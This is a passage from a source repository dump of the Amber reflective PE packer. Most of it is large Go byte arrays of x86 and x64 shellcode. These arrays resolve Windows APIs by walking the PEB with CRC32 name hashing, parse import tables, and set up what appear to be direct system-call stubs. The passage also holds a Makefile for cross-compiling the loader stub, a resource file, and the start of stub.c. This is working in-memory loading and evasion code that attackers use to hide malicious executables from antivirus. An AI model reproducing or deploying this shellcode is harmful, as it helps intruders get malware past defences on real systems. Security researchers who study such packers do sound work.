440 | 0xe7, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x89, 0xc8, 0xc3, 0x41, 0x54, 0x55,
441 | 0x57, 0x56, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0xcd, 0x48, 0x63,
442 | 0x41, 0x3c, 0x8b, 0x84, 0x01, 0x90, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
443 | 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xb0, 0x00, 0x00, 0x00, 0x89, 0xc0,
444 | 0x4c, 0x8d, 0x24, 0x01, 0x41, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75,
445 | 0x6a, 0xba, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00, 0xba,
446 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x97, 0x00, 0x00, 0x00,
447 | 0x48, 0x85, 0xc0, 0x74, 0x03, 0x48, 0x89, 0x06, 0x48, 0x83, 0xc3, 0x08,
448 | 0x48, 0x83, 0xc6, 0x08, 0x4c, 0x8b, 0x03, 0x4d, 0x85, 0xc0, 0x74, 0x2e,
449 | 0x4d, 0x85, 0xc0, 0x78, 0xd6, 0x4a, 0x8d, 0x4c, 0x05, 0x02, 0xba, 0x00,
450 | 0x00, 0x00, 0x00, 0xe8, 0xde, 0xfc, 0xff, 0xff, 0x89, 0xc2, 0x41, 0xb8,
451 | 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xf9, 0xe8, 0x5b, 0x00, 0x00, 0x00,
452 | 0x48, 0x85, 0xc0, 0x74, 0xc7, 0x48, 0x89, 0x06, 0xeb, 0xc2, 0x49, 0x83,
453 | 0xc4, 0x14, 0x41, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x74, 0x2b, 0x89,
454 | 0xc9, 0x48, 0x01, 0xe9, 0xe8, 0xd2, 0xfd, 0xff, 0xff, 0x48, 0x89, 0xc7,
455 | 0x48, 0x85, 0xc0, 0x74, 0x20, 0x41, 0x8b, 0x1c, 0x24, 0x48, 0x01, 0xeb,
456 | 0x41, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x01, 0xee, 0x4c, 0x8b, 0x03, 0x4d,
457 | 0x85, 0xc0, 0x75, 0x9c, 0xeb, 0xc8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb,
458 | 0x05, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x20,
459 | 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0xc3, 0x41, 0x57, 0x41, 0x56, 0x41,
460 | 0x55, 0x41, 0x54, 0x55, 0x57, 0x56, 0x53, 0x48, 0x81, 0xec, 0x58, 0x02,
461 | 0x00, 0x00, 0x48, 0x89, 0xcb, 0x41, 0x89, 0xd5, 0x44, 0x89, 0xc5, 0x48,
462 | 0x63, 0x41, 0x3c, 0x48, 0x01, 0xc8, 0x8b, 0xb0, 0x88, 0x00, 0x00, 0x00,
463 | 0x48, 0x01, 0xce, 0x8b, 0x80, 0x8c, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
464 | 0x2c, 0x44, 0x8b, 0x66, 0x20, 0x44, 0x8b, 0x76, 0x1c, 0x44, 0x8b, 0x7e,
465 | 0x24, 0x8b, 0x46, 0x18, 0x85, 0xc0, 0x0f, 0x84, 0x97, 0x01, 0x00, 0x00,
466 | 0x89, 0xc0, 0x48, 0x89, 0x44, 0x24, 0x20, 0xbf, 0x00, 0x00, 0x00, 0x00,
467 | 0x49, 0x01, 0xcc, 0x41, 0x8b, 0x0c, 0xbc, 0x48, 0x01, 0xd9, 0xba, 0x00,
468 | 0x00, 0x00, 0x00, 0xe8, 0x06, 0xfc, 0xff, 0xff, 0x39, 0xfd, 0x74, 0x1a,
469 | 0x44, 0x39, 0xe8, 0x74, 0x15, 0x48, 0x83, 0xc7, 0x01, 0x48, 0x39, 0x7c,
470 | 0x24, 0x20, 0x75, 0xdb, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x2d, 0x01,
471 | 0x00, 0x00, 0x48, 0x8d, 0x04, 0x7b, 0x42, 0x0f, 0xb7, 0x04, 0x38, 0x48,
472 | 0x8d, 0x04, 0x83, 0x42, 0x8b, 0x04, 0x30, 0x48, 0x01, 0xc3, 0x48, 0x39,
473 | 0xf3, 0x0f, 0x82, 0x0d, 0x01, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x2c, 0x48,
474 | 0x01, 0xc6, 0x48, 0x39, 0xf3, 0x0f, 0x83, 0xfd, 0x00, 0x00, 0x00, 0x48,
475 | 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
476 | 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x7c, 0x24, 0x40, 0xb8, 0x00,
477 | 0x00, 0x00, 0x00, 0xb9, 0x1e, 0x00, 0x00, 0x00, 0xf3, 0x48, 0xab, 0xc7,
478 | 0x07, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x84, 0x24, 0x40, 0x01, 0x00,
479 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x84, 0x24, 0x48, 0x01, 0x00,
480 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0xbc, 0x24, 0x50, 0x01, 0x00,
481 | 0x00, 0xb9, 0x1e, 0x00, 0x00, 0x00, 0xf3, 0x48, 0xab, 0xc7, 0x07, 0x00,
482 | 0x00, 0x00, 0x00, 0x80, 0x3b, 0x2e, 0x0f, 0x84, 0xb3, 0x00, 0x00, 0x00,
483 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x48, 0x83, 0xc0, 0x01,
484 | 0x80, 0x7c, 0x03, 0xff, 0x2e, 0x75, 0xf2, 0x44, 0x89, 0xc6, 0x48, 0x8d,
485 | 0x4c, 0x24, 0x30, 0x48, 0x89, 0xda, 0xe8, 0x27, 0xfb, 0xff, 0xff, 0x8d,
486 | 0x4e, 0x01, 0x48, 0x63, 0xc9, 0x48, 0x01, 0xd9, 0x80, 0x39, 0x00, 0x0f,
487 | 0x84, 0x8e, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x63,
488 | 0xd6, 0x48, 0x01, 0xda, 0x49, 0x89, 0xc0, 0x48, 0x83, 0xc0, 0x01, 0x80,
489 | 0x3c, 0x02, 0x00, 0x75, 0xf3, 0x48, 0x8d, 0x84, 0x24, 0x40, 0x01, 0x00,
490 | 0x00, 0x48, 0x89, 0xca, 0x48, 0x89, 0xc1, 0xe8, 0xea, 0xfa, 0xff, 0xff,
491 | 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xe8, 0x15, 0xfc, 0xff, 0xff, 0x48, 0x89,
492 | 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x74, 0x28, 0x48,
493 | 0x8d, 0x8c, 0x24, 0x40, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
494 | 0xe8, 0xd1, 0xfa, 0xff, 0xff, 0x89, 0xc2, 0x41, 0xb8, 0xff, 0xff, 0xff,
495 | 0xff, 0x48, 0x89, 0xd9, 0xe8, 0x4e, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc3,
496 | 0x48, 0x89, 0xd8, 0x48, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0x5b, 0x5e,
497 | 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0xc3, 0xbe,
498 | 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x53,
499 | 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x82, 0xb8,
500 | 0x00, 0x00, 0x00, 0x00, 0xeb, 0xcd, 0x57, 0x56, 0x53, 0x48, 0x83, 0xec,
501 | 0x20, 0x89, 0xce, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00,
502 | 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x78, 0x20, 0x48, 0x8b, 0x58, 0x20,
503 | 0x48, 0x39, 0xdf, 0x74, 0x2c, 0x0f, 0xb7, 0x53, 0x48, 0x48, 0x8b, 0x4b,
504 | 0x50, 0xe8, 0x58, 0xfa, 0xff, 0xff, 0x39, 0xf0, 0x74, 0x0f, 0x48, 0x8b,
505 | 0x1b, 0x48, 0x39, 0xdf, 0x75, 0xe7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
506 | 0x04, 0x48, 0x8b, 0x43, 0x20, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f,
507 | 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf1, 0x41, 0x56, 0x41, 0x55,
508 | 0x41, 0x54, 0x55, 0x57, 0x56, 0x53, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89,
509 | 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48, 0x01, 0xcf, 0x0f, 0xb7, 0x47, 0x14,
510 | 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00,
511 | 0x00, 0x00, 0x66, 0x83, 0x7f, 0x06, 0x00, 0x74, 0x69, 0xbe, 0x00, 0x00,
512 | 0x00, 0x00, 0x41, 0xbc, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x74, 0x24,
513 | 0x40, 0x4c, 0x8d, 0x6c, 0x24, 0x48, 0xe9, 0x25, 0x01, 0x00, 0x00, 0xb9,
514 | 0x01, 0x00, 0x00, 0x00, 0x25, 0x00, 0x00, 0x00, 0x60, 0x41, 0xb8, 0x01,
515 | 0x00, 0x00, 0x00, 0x3d, 0x00, 0x00, 0x00, 0x60, 0x41, 0xb9, 0x20, 0x00,
516 | 0x00, 0x00, 0xb8, 0x80, 0x00, 0x00, 0x00, 0x44, 0x0f, 0x45, 0xc8, 0xe9,
517 | 0x8c, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x20, 0x00, 0x00, 0x00, 0xe9, 0x91,
518 | 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x01,
519 | 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x50, 0x5b, 0x5e, 0x5f, 0x5d, 0x41,
520 | 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0xc3, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
521 | 0xea, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x45, 0x89, 0xe0, 0x41, 0xb9, 0x10,
522 | 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x44, 0x89, 0xe1, 0xa9, 0x00, 0x00, 0x00,
523 | 0x20, 0x74, 0x32, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x8c,
524 | 0x89, 0xc1, 0xc1, 0xe9, 0x1f, 0x41, 0x89, 0xc8, 0x44, 0x89, 0xe1, 0x41,
525 | 0xb9, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x19, 0xa9, 0x00, 0x00, 0x00, 0x20,
526 | 0x0f, 0x85, 0x69, 0xff, 0xff, 0xff, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x41,
527 | 0xb9, 0x04, 0x00, 0x00, 0x00, 0x45, 0x89, 0xe0, 0x25, 0x00, 0x00, 0x00,
528 | 0x60, 0x3d, 0x00, 0x00, 0x00, 0x60, 0x0f, 0x84, 0x74, 0xff, 0xff, 0xff,
529 | 0x84, 0xc9, 0x74, 0x0c, 0x45, 0x84, 0xc0, 0xb8, 0x40, 0x00, 0x00, 0x00,
530 | 0x44, 0x0f, 0x45, 0xc8, 0x8b, 0x42, 0x0c, 0x48, 0x01, 0xe8, 0x48, 0x89,
531 | 0x44, 0x24, 0x48, 0x8b, 0x42, 0x10, 0x48, 0x89, 0x44, 0x24, 0x40, 0xc7,
532 | 0x44, 0x24, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x3c,
533 | 0x48, 0x89, 0x44, 0x24, 0x20, 0x4d, 0x89, 0xf0, 0x4c, 0x89, 0xea, 0x48,
534 | 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x41, 0xba, 0x41, 0x4d, 0xde, 0x6e,
535 | 0xe8, 0xc4, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc2, 0xe8, 0x76, 0x01, 0x00,
536 | 0x00, 0x85, 0xc0, 0x0f, 0x88, 0x22, 0xff, 0xff, 0xff, 0x83, 0xc6, 0x01,
537 | 0x48, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x0f, 0x8e,
538 | 0x16, 0xff, 0xff, 0xff, 0x48, 0x89, 0xda, 0x8b, 0x43, 0x24, 0x85, 0xc0,
539 | 0x74, 0xe3, 0x41, 0x89, 0xc1, 0x41, 0xc1, 0xf9, 0x1f, 0x41, 0x83, 0xe1,
540 | 0xc8, 0x41, 0x83, 0xc1, 0x40, 0xa9, 0x00, 0x00, 0x00, 0x40, 0x0f, 0x84,
541 | 0x1d, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x3b, 0xff, 0xff, 0xff,
542 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x0f, 0x85, 0xfa, 0xfe, 0xff, 0xff, 0xb9,
543 | 0x01, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0xe9, 0x36,
544 | 0xff, 0xff, 0xff, 0x56, 0x53, 0x48, 0x83, 0xec, 0x28, 0x48, 0x89, 0xce,
545 | 0x48, 0x63, 0x41, 0x3c, 0x8b, 0x84, 0x01, 0xd0, 0x00, 0x00, 0x00, 0xba,
546 | 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x11, 0x89, 0xc0, 0x48, 0x8b,
547 | 0x5c, 0x01, 0x18, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x75,
548 | 0x1d, 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x28, 0x5b, 0x5e, 0xc3, 0x41, 0xb8,
549 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf1,
550 | 0xff, 0xd0, 0x48, 0x83, 0xc3, 0x08, 0x48, 0x8b, 0x03, 0x48, 0x85, 0xc0,
551 | 0x75, 0xe4, 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xd4, 0x41, 0x51, 0x41,
552 | 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60,
553 | 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50,
554 | 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac,
555 | 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8,
556 | 0xe2, 0xee, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c,
557 | 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x65, 0x8b,
558 | 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x5a, 0x48, 0x01,
559 | 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0,
560 | 0xe3, 0x49, 0x4c, 0x8b, 0x4c, 0x24, 0x08, 0x48, 0xff, 0xc9, 0x41, 0x8b,
561 | 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0xf2, 0x44, 0x0f,
562 | 0x38, 0xf0, 0xc8, 0x38, 0xe0, 0x75, 0xf2, 0x45, 0x39, 0xd1, 0x75, 0xdc,
563 | 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c,
564 | 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88,
565 | 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58,
566 | 0x41, 0x59, 0xc3, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x5d,
567 | 0xff, 0xff, 0xff, 0xe8, 0x14, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74,
568 | 0x06, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x4d, 0x31, 0xd2, 0x49, 0xff,
569 | 0xca, 0x41, 0x53, 0xc3, 0x51, 0x55, 0x48, 0x89, 0xe5, 0x4c, 0x89, 0xd1,
570 | 0x41, 0x52, 0x49, 0x83, 0xc2, 0x64, 0x4c, 0x39, 0xd1, 0x7f, 0x2a, 0x8b,
571 | 0x01, 0xc1, 0xe0, 0x08, 0x3d, 0x00, 0x0f, 0x05, 0xc3, 0x74, 0x05, 0x48,
572 | 0xff, 0xc1, 0xeb, 0xea, 0x41, 0x5a, 0x4c, 0x39, 0xd1, 0x7c, 0x12, 0x48,
573 | 0x8b, 0x01, 0x3d, 0x4c, 0x8b, 0xd1, 0xb8, 0x74, 0x02, 0xe2, 0xef, 0x48,
574 | 0xc1, 0xe8, 0x20, 0xeb, 0x03, 0x48, 0x31, 0xc0, 0x48, 0x89, 0xec, 0x5d,
575 | 0x59, 0xc3, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x59, 0x48, 0x29, 0xf1, 0x48,
576 | 0x83, 0xc1, 0x14, 0x48, 0x89, 0xf7, 0x48, 0x83, 0xef, 0x05, 0xf3, 0xaa,
577 | 0xfc, 0x48, 0x89, 0xec, 0x5d, 0xff, 0xe0,
578 | }
579 |
580 | var CRC_API_64 = []byte{
581 | 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48,
582 | 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48,
583 | 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x41,
584 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c,
585 | 0x02, 0x2c, 0x20, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8, 0xe2, 0xee, 0x52,
586 | 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0,
587 | 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x65, 0x8b, 0x80, 0x88, 0x00,
588 | 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x5a, 0x48, 0x01, 0xd0, 0x50, 0x8b,
589 | 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x49, 0x4c,
590 | 0x8b, 0x4c, 0x24, 0x08, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
591 | 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8,
592 | 0x38, 0xe0, 0x75, 0xf2, 0x45, 0x39, 0xd1, 0x75, 0xdc, 0x58, 0x44, 0x8b,
593 | 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b,
594 | 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0,
595 | 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0xc3,
596 | 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff,
597 | }
598 |
599 | var CRC_API_32 = []byte{
600 | 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c,
601 | 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,
602 | 0xbf, 0x00, 0x00, 0x00, 0x00, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20,
603 | 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52, 0x10,
604 | 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x42, 0x01, 0xd1, 0x51,
605 | 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x34, 0x8b, 0x7d,
606 | 0xf8, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0xac, 0xf2, 0x0f, 0x38, 0xf0,
607 | 0xf8, 0x38, 0xe0, 0x75, 0xf6, 0x3b, 0x7d, 0x24, 0x75, 0xe6, 0x58, 0x8b,
608 | 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
609 | 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b,
610 | 0x61, 0xc3, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8e,
611 | }
612 |
613 | var IAT_API_64 = []byte{
614 | 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48,
615 | 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48,
616 | 0x8b, 0x52, 0x20, 0x52, 0x66, 0x03, 0x52, 0x3c, 0x8b, 0x92, 0x90, 0x00,
617 | 0x00, 0x00, 0x48, 0x03, 0x14, 0x24, 0x52, 0x48, 0x8b, 0x74, 0x24, 0x08,
618 | 0x48, 0x83, 0xec, 0x10, 0x48, 0x83, 0xea, 0x14, 0x48, 0x83, 0xc2, 0x14,
619 | 0x83, 0x3a, 0x00, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x74,
620 | 0x24, 0x10, 0x66, 0x8b, 0x72, 0x0c, 0x48, 0x31, 0xff, 0x48, 0x31, 0xc0,
621 | 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x0f, 0x38, 0xf0, 0xf8,
622 | 0xf2, 0x0f, 0x38, 0xf0, 0xfc, 0x84, 0xc0, 0x75, 0xe8, 0x48, 0x89, 0x54,
623 | 0x24, 0x08, 0x89, 0x3c, 0x24, 0x8b, 0x0a, 0x48, 0x03, 0x4c, 0x24, 0x18,
624 | 0x48, 0x83, 0xe9, 0x08, 0x48, 0x8b, 0x3c, 0x24, 0x48, 0x83, 0xc1, 0x08,
625 | 0x83, 0x39, 0x00, 0x74, 0xaf, 0x8b, 0x31, 0x48, 0x0f, 0xba, 0xf6, 0x3f,
626 | 0x72, 0xea, 0x48, 0x03, 0x74, 0x24, 0x18, 0x48, 0x83, 0xc6, 0x02, 0x48,
627 | 0x31, 0xc0, 0xac, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0x38, 0xe0, 0x75, 0xf3,
628 | 0x44, 0x39, 0xd7, 0x75, 0xcf, 0x8b, 0x42, 0x10, 0x8b, 0x12, 0x48, 0x03,
629 | 0x54, 0x24, 0x18, 0x48, 0x29, 0xd1, 0x48, 0x03, 0x44, 0x24, 0x18, 0x48,
630 | 0x01, 0xc8, 0x41, 0x58, 0x41, 0x58, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59,
631 | 0x5a, 0x41, 0x58, 0x41, 0x59, 0x48, 0x8b, 0x00, 0xc3, 0x48, 0x83, 0xc4,
632 | 0x48, 0xc3,
633 | }
634 |
635 | var IAT_API_32 = []byte{
636 | 0x60, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
637 | 0x14, 0x8b, 0x52, 0x10, 0x52, 0x03, 0x52, 0x3c, 0x8b, 0x92, 0x80, 0x00,
638 | 0x00, 0x00, 0x03, 0x14, 0x24, 0x52, 0x8b, 0x74, 0x24, 0x04, 0x83, 0xec,
639 | 0x08, 0x83, 0xea, 0x14, 0x83, 0xc2, 0x14, 0x83, 0x3a, 0x00, 0x74, 0x77,
640 | 0x8b, 0x74, 0x24, 0x08, 0x66, 0x8b, 0x72, 0x0c, 0x31, 0xff, 0xac, 0x3c,
641 | 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0xf2, 0x0f,
642 | 0x38, 0xf0, 0xfc, 0x84, 0xc0, 0x75, 0xeb, 0x89, 0x54, 0x24, 0x04, 0x89,
643 | 0x3c, 0x24, 0x8b, 0x0a, 0x03, 0x4c, 0x24, 0x0c, 0x83, 0xe9, 0x04, 0x8b,
644 | 0x3c, 0x24, 0x83, 0xc1, 0x04, 0x83, 0x39, 0x00, 0x74, 0xbe, 0x8b, 0x31,
645 | 0x81, 0xfe, 0x00, 0x00, 0x00, 0x80, 0x79, 0xeb, 0x03, 0x74, 0x24, 0x0c,
646 | 0x83, 0xc6, 0x02, 0xac, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0x84, 0xc0, 0x75,
647 | 0xf6, 0x3b, 0x7c, 0x24, 0x34, 0x75, 0xd4, 0x8b, 0x42, 0x10, 0x8b, 0x12,
648 | 0x03, 0x54, 0x24, 0x0c, 0x29, 0xd1, 0x03, 0x44, 0x24, 0x0c, 0x01, 0xc8,
649 | 0x89, 0x44, 0x24, 0x2c, 0x83, 0xc4, 0x10, 0x61, 0x8b, 0x00, 0xc3, 0x83,
650 | 0xc4, 0x0f, 0x61, 0xc3,
651 | }
652 |
--------------------------------------------------------------------------------
/stub/Makefile:
--------------------------------------------------------------------------------
1 | normal:
2 | i686-w64-mingw32-windres Resource.rc -o res.o
3 | i686-w64-mingw32-g++-win32 -c stub.c -o stub.o
4 | i686-w64-mingw32-g++-win32 -Wl,--subsystem,windows stub.o res.o -o stub32.exe
5 | i686-w64-mingw32-strip stub32.exe
6 | x86_64-w64-mingw32-windres Resource.rc -o res.o
7 | x86_64-w64-mingw32-g++-win32 -c stub.c -o stub.o
8 | x86_64-w64-mingw32-g++-win32 -Wl,--subsystem,windows stub.o res.o -o stub.exe
9 | x86_64-w64-mingw32-strip stub.exe
10 | rm *.o
11 |
--------------------------------------------------------------------------------
/stub/Resource.rc:
--------------------------------------------------------------------------------
1 | id ICON "amber.ico"
2 | 2 VERSIONINFO
3 | FILEVERSION 2,1,0,0
4 | PRODUCTVERSION 2,1,0,0
5 | BEGIN
6 | BLOCK "StringFileInfo"
7 | BEGIN
8 | BLOCK "080904E4"
9 | BEGIN
10 | VALUE "CompanyName", "PRODAFT"
11 | VALUE "FileDescription", "Amber - Reflective PE Packer"
12 | VALUE "FileVersion", "2.1"
13 | VALUE "InternalName", "AMBER"
14 | VALUE "LegalCopyright", "Ege Balci"
15 | VALUE "OriginalFilename", "amber.exe"
16 | VALUE "ProductName", "AMBER - Reflective PE Packer"
17 | VALUE "ProductVersion", "3.0.0"
18 | END
19 | END
20 | BLOCK "VarFileInfo"
21 | BEGIN
22 | VALUE "Translation", 0x809, 1252
23 | END
24 | END
25 |
--------------------------------------------------------------------------------
/stub/amber.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/stub/amber.ico
--------------------------------------------------------------------------------
/stub/stub.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | int main(int argc, char const *argv[])
4 | {
5 |
6 | // Just for the imports
7 | HMODULE k32 = LoadLibrary("USER32.dll");
8 | GetProcAddress(k32, "VirtualAlloc");
9 |
10 | // Get module handle
11 | LPVOID moduleHandle = GetModuleHandle(NULL);
12 | if (moduleHandle == NULL)
13 | return 1;
14 |
15 | PIMAGE_DOS_HEADER dosHeader = {};
16 | PIMAGE_SECTION_HEADER sectionHeader = {};
17 | dosHeader = (PIMAGE_DOS_HEADER)moduleHandle;
18 |
19 | #if defined(__MINGW64__) || defined(_WIN64)
20 | PIMAGE_NT_HEADERS64 imageNTHeaders = {};
21 | imageNTHeaders = (PIMAGE_NT_HEADERS64)(moduleHandle + dosHeader->e_lfanew);
22 | __int64 sectionLocation = (__int64)((__int64)(&imageNTHeaders->OptionalHeader) + (WORD)imageNTHeaders->FileHeader.SizeOfOptionalHeader);
23 | FlushInstructionCache(moduleHandle, NULL, NULL);
24 | #else
25 | PIMAGE_NT_HEADERS imageNTHeaders = {};
26 | imageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD)moduleHandle + dosHeader->e_lfanew);
